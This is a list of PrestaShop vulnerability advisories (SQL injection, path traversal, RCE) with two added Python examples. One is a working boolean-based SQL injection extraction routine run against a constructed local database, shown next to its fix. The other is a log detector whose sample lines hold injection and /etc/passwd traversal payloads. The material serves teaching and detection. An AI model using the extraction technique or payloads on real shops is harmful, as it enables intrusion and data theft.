
CVE-2023-39526 – PrestaShop SQL manager vulnerability (potential RCE)
https://notcve.org/view.php?id=CVE-2023-39526
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Versions prior to 1.7.8.10, 8.0.5, and 8.1.1 are vulnerable to remote code execution through SQL injection and arbitrary file write in the back office. Versions 1.7.8.10, 8.0.5, and 8.1.1 contain a patch. There are no known workarounds. • https://github.com/dnkhack/fixcve2023_39526_2023_39527 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-39525 – PrestaShop vulnerable to path traversal
https://notcve.org/view.php?id=CVE-2023-39525
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, an attacker with back-office access can delete files outside the intended import directory by replaying the import-file deletion request with a file path containing directory-traversal sequences. Version 8.1.1 contains a patch for this issue. There are no known workarounds. • https://github.com/PrestaShop/PrestaShop/commit/c7c9a5110421bb2856f4d312ecce192d079b5ec7 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •

CVE-2023-39524 – PrestaShop vulnerable to boolean SQL injection in search product in BO
https://notcve.org/view.php?id=CVE-2023-39524
07 Aug 2023 — PrestaShop is an open source e-commerce web application. Prior to version 8.1.1, the product search field on the back office (BO) product page is vulnerable to boolean-based SQL injection. Version 8.1.1 contains a patch for this issue. There are no known workarounds. • https://github.com/PrestaShop/PrestaShop/commit/2047d4c053043102bc46a37d383b392704bf14d7 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
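The boolean-based injection this entry describes, as an added example (not code from PrestaShop or from this advisory): a stand-in product search over an in-memory SQLite table, built by string concatenation the way the affected code class is, turned into a true/false oracle that extracts a value the attacker cannot read directly, beside the parameterized form that closes the hole. The schema, the `Mug` search term and the employee e-mail are constructed and are not PrestaShop's.

```python
import sqlite3


def make_shop_db():
    """Constructed in-memory stand-in for a shop database; not PrestaShop's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE product (id_product INTEGER PRIMARY KEY, name TEXT NOT NULL);
        INSERT INTO product (name) VALUES ('Blue T-shirt'), ('Red Mug'), ('Grey Hoodie');
        CREATE TABLE employee (id_employee INTEGER PRIMARY KEY, email TEXT NOT NULL);
        INSERT INTO employee (email) VALUES ('admin@example.test');
        """
    )
    return conn


def search_products_vulnerable(conn, term):
    # The bug class on this page: the search term is spliced into the SQL text.
    sql = "SELECT id_product, name FROM product WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_products_fixed(conn, term):
    # Bound parameter: the term can never change the statement's structure.
    sql = "SELECT id_product, name FROM product WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def boolean_oracle(conn, condition):
    """One bit per request: does the page list any product or none?

    The payload closes the LIKE literal, injects `condition`, and re-balances
    the quotes so the statement stays syntactically valid."""
    payload = "Mug%' AND (" + condition + ") AND '%'='"
    return len(search_products_vulnerable(conn, payload)) > 0


def extract_via_oracle(conn, scalar_subquery, max_len=64):
    """Recover a string the attacker cannot read directly, one binary search per character.

    Uses SQLite's unicode()/substr()/length() so no quotes are needed inside the condition."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(conn, f"length(({scalar_subquery})) >= {pos}"):
            break  # past the end of the secret
        lo, hi = 32, 126  # printable ASCII is enough for an e-mail address
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(conn, f"unicode(substr(({scalar_subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_shop_db()
    secret = "SELECT email FROM employee WHERE id_employee = 1"
    print("vulnerable search leaks:", extract_via_oracle(db, secret))
    print("fixed search, same payload:", search_products_fixed(db, "Mug%' AND (1=1) AND '%'='"))
```

Each oracle call costs one request, so the binary search over the printable range needs about seven requests per character; a real back-office search that renders "N results" gives exactly this bit. In a PrestaShop module the equivalent of the fixed form is a bound or pSQL()/(int)-cast value rather than a concatenated string.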

CVE-2023-33777
https://notcve.org/view.php?id=CVE-2023-33777
25 Jul 2023 — An issue in /functions/fbaorder.php of the PrestaShop Amazon module (amazon) before v5.2.24 allows attackers to perform a directory traversal attack. • https://addons.prestashop.com/fr/marketplace/2501-amazon-market-place.html • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •

CVE-2023-30153
https://notcve.org/view.php?id=CVE-2023-30153
18 Jul 2023 — An SQL injection vulnerability in the Payplug (payplug) module for PrestaShop, in versions 3.6.0, 3.6.1, 3.6.2, 3.6.3, 3.7.0 and 3.7.1, allows remote attackers to execute arbitrary SQL commands via the ajax.php front controller. • https://addons.prestashop.com/en/payment-card-wallet/8795--payplug-accept-customer-payments-wherever-they-are.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-30151
https://notcve.org/view.php?id=CVE-2023-30151
13 Jul 2023 — A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote attackers to execute arbitrary SQL commands via the `key` GET parameter. • https://addons.prestashop.com/en/shipping-carriers/1755-boxtal-connect-turnkey-shipping-solution.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-31672
https://notcve.org/view.php?id=CVE-2023-31672
15 Jun 2023 — The "Length, weight or volume sell" (ailinear) module for PrestaShop, in versions prior to 2.4.3, contains a SQL injection vulnerability. • https://friends-of-presta.github.io/security-advisories/modules/2023/06/15/ailinear.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-30149
https://notcve.org/view.php?id=CVE-2023-30149
02 Jun 2023 — SQL injection vulnerability in the City Autocomplete (cityautocomplete) module from ebewe.net for PrestaShop, prior to version 1.8.12 (for PrestaShop 1.5/1.6) or prior to 2.0.3 (for PrestaShop 1.7), allows remote attackers to execute arbitrary SQL commands via the type, input_name, or q parameter in the autocompletion.php front controller. • https://addons.prestashop.com/fr/inscription-processus-de-commande/6097-city-autocomplete.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-30192
https://notcve.org/view.php?id=CVE-2023-30192
11 May 2023 — Prestashop possearchproducts 1.7 is vulnerable to SQL Injection via PosSearch::find(). • https://friends-of-presta.github.io/security-advisories/modules/2023/05/11/possearchproducts.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-30194
https://notcve.org/view.php?id=CVE-2023-30194
10 May 2023 — Prestashop posstaticfooter <= 1.0.0 is vulnerable to SQL Injection via posstaticfooter::getPosCurrentHook(). • https://friends-of-presta.github.io/security-advisories/modules/2023/05/09/posstaticfooter.html • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
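For hunting exploitation attempts against the module endpoints named in the entries above, an added example (not from notcve.org, PrestaShop or any of the modules): a detector over constructed Apache-style access-log lines that inspects the `type`/`input_name`/`q` parameters of autocompletion.php (cityautocomplete), every parameter of ajax.php (payplug) and fbaorder.php (amazon), and the `key` GET parameter from the Boxtal (envoimoinscher) entry, after double URL-decoding, for injection and traversal indicators. The log lines, IP addresses and URL paths are constructed; module URL layouts are an assumption, so matching is on the script basename only.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names and parameters taken from the advisories above. Module URL layout is not
# given on this page, so matching is on the script basename only (an assumption a real
# deployment would replace with its own module paths).
WATCHED_SCRIPTS = {
    "autocompletion.php": ("cityautocomplete", {"type", "input_name", "q"}),
    "ajax.php": ("payplug", None),   # None: inspect every parameter
    "fbaorder.php": ("amazon", None),
}
# The Boxtal advisory names only the `key` GET parameter, so it is checked wherever it appears.
WATCHED_PARAMS = {"key": "envoimoinscher"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Deliberately narrow indicators: quote followed by a boolean keyword, UNION ... SELECT,
# time-based functions, and comment terminators.
SQLI_RE = re.compile(
    r"(?i)(?:'\s*(?:or|and)\b|\bunion\b[\s\S]*\bselect\b|\b(?:sleep|benchmark)\s*\(|--[\s-]|/\*)"
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

# Constructed sample log; addresses are documentation ranges and paths are assumed.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Jun/2023:09:15:01 +0000] "GET /modules/cityautocomplete/autocompletion.php?type=city&input_name=city&q=Par HTTP/1.1" 200 412
203.0.113.11 - - [02/Jun/2023:09:15:07 +0000] "GET /modules/cityautocomplete/autocompletion.php?type=city%27%20AND%20SLEEP(5)--%20&q=Par HTTP/1.1" 200 412
198.51.100.7 - - [25/Jul/2023:22:40:13 +0000] "GET /modules/amazon/functions/fbaorder.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1830
198.51.100.7 - - [13/Jul/2023:03:02:44 +0000] "GET /index.php?fc=module&module=envoimoinscher&key=1%2527%2520UNION%2520SELECT%25201%252C2--%2520- HTTP/1.1" 200 77
203.0.113.12 - - [18/Jul/2023:11:00:00 +0000] "GET /index.php?id_product=12&controller=product HTTP/1.1" 200 9031
"""


def decode_twice(value):
    # parse_qsl already decoded once; a second pass catches %2527-style double encoding.
    return unquote(unquote(value))


def classify(value):
    """Return 'traversal', 'sqli' or None for one decoded parameter value."""
    if TRAVERSAL_RE.search(value):
        return "traversal"
    if SQLI_RE.search(value):
        return "sqli"
    return None


def analyze_line(line):
    """Return a finding dict for the first suspicious watched parameter, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    script = url.path.rsplit("/", 1)[-1]
    module, watched_params = WATCHED_SCRIPTS.get(script, (None, set()))
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        if watched_params is None or name in watched_params:
            owner = module
        else:
            owner = WATCHED_PARAMS.get(name)
        if owner is None:
            continue
        decoded = decode_twice(raw)
        kind = classify(decoded)
        if kind:
            return {"ip": m.group("ip"), "ts": m.group("ts"), "module": owner,
                    "script": script, "param": name, "kind": kind, "value": decoded}
    return None


def hunt(log_text):
    """Run analyze_line over every line and keep the findings, in log order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(f"{finding['ts']} {finding['ip']} {finding['module']} "
              f"{finding['script']}?{finding['param']} [{finding['kind']}] {finding['value']!r}")
```

POST bodies (the payplug ajax.php controller is as likely to receive POST as GET) do not appear in a standard access log, so this only sees query strings; pair it with application logs or a WAF capture for the rest. The indicator patterns are intentionally narrow to keep false positives low on legitimate search terms.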